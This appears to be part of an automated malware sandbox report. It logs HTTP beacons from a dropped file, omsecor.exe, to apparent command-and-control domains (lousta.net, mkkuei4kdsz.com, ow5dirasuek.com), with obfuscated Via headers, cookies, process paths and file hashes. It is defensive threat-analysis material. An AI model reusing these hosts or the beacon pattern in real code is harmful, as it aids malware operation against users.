                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.699565887 CET186OUTGET /404/921.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481198045666
                                                                                                                                                                                                              Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.649727193.166.255.171803756C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.321299076 CET185OUTGET /97/341.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481198045666
                                                                                                                                                                                                              Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.64976915.197.204.56803756C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.951946020 CET191OUTGET /922/501.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481198045666
                                                                                                                                                                                                              Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
                                                                                                                                                                                                              Host: mkkuei4kdsz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.623764038 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:22:19 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.64977652.34.198.229803756C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.936713934 CET191OUTGET /158/381.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481198045666
                                                                                                                                                                                                              Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
                                                                                                                                                                                                              Host: ow5dirasuek.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.790091991 CET419INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:22:20 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.649788193.166.255.171801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.379038095 CET186OUTGET /719/772.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.649830193.166.255.171801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.121573925 CET186OUTGET /106/649.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.64987915.197.204.56801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.729095936 CET190OUTGET /87/444.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: mkkuei4kdsz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.356230974 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:22:39 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.845740080 CET191OUTGET /126/170.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: mkkuei4kdsz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.006225109 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:22:57 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.64988552.34.198.229801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478585005 CET301OUTGET /65/168.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: ow5dirasuek.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.327507973 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:22:40 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.649891193.166.255.171801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463457108 CET186OUTGET /810/632.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.649938193.166.255.171801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244889975 CET186OUTGET /639/772.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.64998352.34.198.229801268C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116975069 CET301OUTGET /524/9.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`
                                                                                                                                                                                                              Host: ow5dirasuek.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.960884094 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:22:58 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              11192.168.2.649989193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171910048 CET161OUTGET /128/758.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              12192.168.2.649995193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775427103 CET161OUTGET /107/805.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              13192.168.2.64999615.197.204.56803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.369029999 CET166OUTGET /932/965.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
                                                                                                                                                                                                              Host: mkkuei4kdsz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.998203993 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:23:16 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              14192.168.2.64999752.34.198.229803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.118930101 CET278OUTGET /913/437.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]
                                                                                                                                                                                                              Host: ow5dirasuek.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.946367025 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:23:17 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              15192.168.2.649998193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:18.179202080 CET169OUTGET /883/755.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              16192.168.2.649999193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.788692951 CET168OUTGET /761/49.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              17192.168.2.65000115.197.204.56803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.949491024 CET174OUTGET /477/877.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: mkkuei4kdsz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.587837934 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:23:36 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              18192.168.2.65000252.34.198.229803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.713290930 CET286OUTGET /503/726.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: ow5dirasuek.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.569514036 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:23:37 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              19192.168.2.650003193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.791393042 CET169OUTGET /526/179.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              20192.168.2.650004193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.399684906 CET169OUTGET /171/705.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              21192.168.2.65000515.197.204.56803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.166052103 CET174OUTGET /558/583.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: mkkuei4kdsz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.834677935 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:23:55 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              22192.168.2.65000652.34.198.229803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.993933916 CET286OUTGET /640/808.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: ow5dirasuek.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0
                                                                                                                                                                                                              Nov 1, 2024 16:23:56.826276064 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 15:23:56 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474636|1730474540|18|6|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              23192.168.2.650007193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:23:57.054321051 CET168OUTGET /761/32.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              24192.168.2.650009193.166.255.171803908C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.688517094 CET169OUTGET /691/461.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481401170560
                                                                                                                                                                                                              Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:11:21:59
                                                                                                                                                                                                              Start date:01/11/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\nNX5KYQRhg.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\nNX5KYQRhg.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:82'768 bytes
                                                                                                                                                                                                              MD5 hash:44A881B87BB2D5DFE7062B9A7538425F
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:11:21:59
                                                                                                                                                                                                              Start date:01/11/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:82'768 bytes
                                                                                                                                                                                                              MD5 hash:DCC8263D314F19A3A35E32EDFCCDC942
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
